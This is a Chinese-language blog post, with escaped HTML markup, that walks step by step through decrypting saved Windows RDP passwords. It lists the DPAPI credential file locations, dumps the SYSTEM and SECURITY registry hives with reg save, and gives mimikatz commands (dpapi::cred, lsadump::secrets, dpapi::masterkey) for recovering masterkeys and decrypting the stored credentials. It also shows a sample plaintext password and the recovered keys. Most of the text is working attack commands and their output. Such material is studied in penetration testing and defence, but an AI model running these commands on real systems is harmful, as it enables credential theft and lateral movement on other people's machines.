step1 \u67e5\u770bRDP\u5bc6\u7801\u51ed\u636e<\/h4>\n
\u7cfb\u7edfRDP\u5bc6\u7801\u51ed\u636e\u5b58\u653e\u4f4d\u7f6e<\/p>\n
C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\<\/code><\/pre>\n\u7528\u6237RDP\u5bc6\u7801\u51ed\u636e\u5b58\u653e\u4f4d\u7f6e<\/p>\n
C:\\Users\\[user]\\AppData\\Local\\Microsoft\\Credentials\\\nC:\\Users\\[user]\\AppData\\Roaming\\Microsoft\\Credentials\\<\/code><\/pre>\nstep2 \u83b7\u53d6guidMasterKey<\/h4>\n
\u901a\u8fc7mimikatz\u83b7\u53d6RDP\u5bc6\u7801\u51ed\u636e\u5bf9\u5e94\u7684guidMasterKey<\/code>\uff0c\u8fd9\u91cc\u5206\u522b\u7528\u7cfb\u7edf\u548c\u7528\u6237\u7684RDP\u5bc6\u7801\u51ed\u636e\u6765\u6f14\u793a<\/p>\nmimikatz.exe "privilege::debug" "dpapi::cred \/in:DFBE70A7E5CC19A398EBF1B96859CE5D" exit\n\/\/ \u7cfb\u7edfRDP\u5bc6\u7801\u51ed\u636e<\/code><\/pre>\n![\"RDPCre_dec_1\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_1.png\")
<\/p>\n
mimikatz.exe "privilege::debug" "dpapi::cred \/in:14396336784B72E4294497641A22A484" exit\n\/\/ \u7528\u6237RDP\u5bc6\u7801\u51ed\u636e<\/code><\/pre>\n![\"RDPCre_dec_2\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_2.png\")
<\/p>\n
step3 \u83b7\u53d6masterkey<\/h4>\n
\u6839\u636e\u662f\u7cfb\u7edf\u8fd8\u662f\u7528\u6237RDP\u5bc6\u7801\u51ed\u636e\uff0c\u53bb\u627e\u5bf9\u5e94\u8eab\u4efd\u51ed\u8bc1 masterkey<\/p>\n
\u7cfb\u7edf MasterKey file<\/h5>\n
\u7cfb\u7edf MasterKey file\u5b58\u653e\u4f4d\u7f6e\u5982\u4e0b<\/p>\n
%WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\n\u4f8b\u5982\uff1aC:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User<\/code><\/pre>\n\u5bfc\u51fa system \u548c security<\/p>\n
reg save hklm\\system SYSTEM.hive\nreg save hklm\\security SECURITY.hive<\/code><\/pre>\n\u901a\u8fc7mimikatz\u83b7\u53d6DPAPI_SYSTEM\u4e2d\u7684user hash<\/p>\n
mimikatz.exe "privilege::debug" "lsadump::secrets \/system:SYSTEM.hive \/security:SECURITY.hive" exit<\/code><\/pre>\n![\"RDPCre_dec_3\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_3.png\")
<\/p>\n
\u6839\u636euser hash\u83b7\u53d6masterkey<\/code><\/p>\nmimikatz.exe "privilege::debug" "dpapi::masterkey \/in:461706d7-0e17-40cd-bb2a-20584c2677d0 \/system:8be2afb7cb82c63b74770e61b5d4938573ad145f" exit<\/code><\/pre>\n![\"RDPCre_dec_4\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_4.png\")
<\/p>\n
0cbf703b58cde2f51a9a958a4263facebef4e12ea4a66f7fd3b63e92c9cab562c911ac5f1cb90e24efb14e11eb9e74f0c619ab871fa2a023e18f753235c1ad4f<\/code><\/pre>\n\u7528\u6237 MasterKey file<\/h5>\n
\u7528\u6237 MasterKey file\u5b58\u653e\u4f4d\u7f6e\u5982\u4e0b<\/p>\n
%APPDATA%\\Microsoft\\Protect\\%SID%\n\u4f8b\u5982\uff1aC:\\Users\\[user]\\AppData\\Roaming\\Microsoft\\Protect\\[SID]<\/code><\/pre>\n\u627e\u5230\u5bf9\u5e94\u8eab\u4efd\u51ed\u8bc1\u5e76\u8bb0\u5f55 SID \u6587\u4ef6\u540d<\/p>\n
![\"RDPCre_dec_5\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_5.png\")
<\/p>\n
\u901a\u8fc7mimikatz\u914d\u5408\u7528\u6237\u5bc6\u7801\u83b7\u53d6masterkey<\/code><\/p>\nmimikatz.exe "privilege::debug" "dpapi::masterkey \/in:61e93ed3-5ca2-4e98-a27b-b8a09fcf618d \/sid:S-1-5-21-1507239155-486581747-1996177333-1000 \/password:Jo9657! \/protected" exit<\/code><\/pre>\n![\"RDPCre_dec_6\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_6.png\")
<\/p>\n
75690187db3d7b10dbad020d97ee3557178b86d34736f60fed190de957366d803c7c46a563bfa08f345a70f7b77578f821c2cc38f5b182c1cfeb7a6b84834125<\/code><\/pre>\nstep4 \u89e3\u5bc6pbData<\/h4>\n
\u6700\u540e\u7528masterkey<\/code>\u89e3\u5bc6pbData<\/code>\u6570\u636e<\/p>\nmimikatz.exe "privilege::debug" "dpapi::cred \/in:DFBE70A7E5CC19A398EBF1B96859CE5D \/masterkey:0cbf703b58cde2f51a9a958a4263facebef4e12ea4a66f7fd3b63e92c9cab562c911ac5f1cb90e24efb14e11eb9e74f0c619ab871fa2a023e18f753235c1ad4f" exit<\/code><\/pre>\n![\"RDPCre_dec_7\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_7.png\")
<\/p>\n
mimikatz.exe "privilege::debug" "dpapi::cred \/in:14396336784B72E4294497641A22A484 \/masterkey:75690187db3d7b10dbad020d97ee3557178b86d34736f60fed190de957366d803c7c46a563bfa08f345a70f7b77578f821c2cc38f5b182c1cfeb7a6b84834125" exit<\/code><\/pre>\n![\"RDPCre_dec_8\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_8.png\")
<\/p>\n
\u4e00\u628a\u68ad<\/h4>\n
![\"RDPCre_dec_9\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/RDPCre_dec_9.png\")
<\/p>\n